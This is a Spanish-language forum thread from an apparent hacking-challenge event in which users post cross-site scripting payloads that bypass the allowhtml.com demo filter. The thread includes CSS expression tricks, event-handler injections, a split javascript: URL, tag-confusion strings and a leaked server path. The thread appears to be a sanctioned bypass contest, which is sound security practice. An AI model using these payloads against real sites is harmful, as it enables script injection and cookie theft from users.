Can You Hack?
Semi-allowhtml
CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D
Hola!
Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/
Yo lo bypasee hace rato xD
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div> Asi que no esta muy dificil!
Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net
Saludos!!
alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat
en concreto... el campo style de la etiqueta div
gracias y un saludo :3
Es parte de la celebración de abril negro?
No había puesto WHK el filtro de otra página?
el de WHK es PHPIDS
ese es otro
y no tiene nada que ver con abril negro xD
ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?
<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />
jajajajaja
Raro, porque?, Creo que es CSS Injection :P, Además si mal no recuerdo, expression es solo para IE! :silbar:
<XSS STYLE="xss:expression(alert('XSS'))">...
Esto hace cosas raras:
<a href="></a>
Es lo primero que he probado, luego lo miro un poco más.
Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P
<a href="javascr
ipt:a
lert(1);" target="_blank">asd</a>
Quiero una cuenta... =P
<script>><img src=x onerror=alert(/cuack/) tr=
jejejejeje ;-)
Parece que aún vale, asique :P
<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>
otro,
<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><
<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=
jajaja que chafa el filtro
File disclosoure no vale?
CitarWarning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7
Phat disculosure :P
Aquí estan los mios:
<script>>"/><a><<img src=lol.gif onerror=alert(1)> >
<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >
'>><marquee><h1>XSS</h1></marquee>
<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>
<script>><p lang="es"</p> onmouseup=alert('XSS')>>
<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>
Saludos!!
Pero si son todos el mismo...xD
Además, el último de netscape no es ni siquiera un bypass. ¬¬
A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.
El último de netscape qué tiene de inyección de javascript?
Castg no necesitas inyectar javascript para que sea xss
¬¬ pero este desafio es asi :D jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.
la idea, es poder inyectar el codigo javascript para quitar una cookie.
pues ya se cumplieron los 2
xD
>:( >:(
YA SE QUE ELPRIMERO SIRVE!!
pero el segundo no!
Si te refieres al se SeC (<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>) si sirve, debes hacer click en el enlace que se genera :D
uy dios!, hay 3!
pero los dos primeros son iguales!, es como q ponga alert(1) y en otro alert(2), la inyeccion es la misma, pero el tercero, no es de javascript!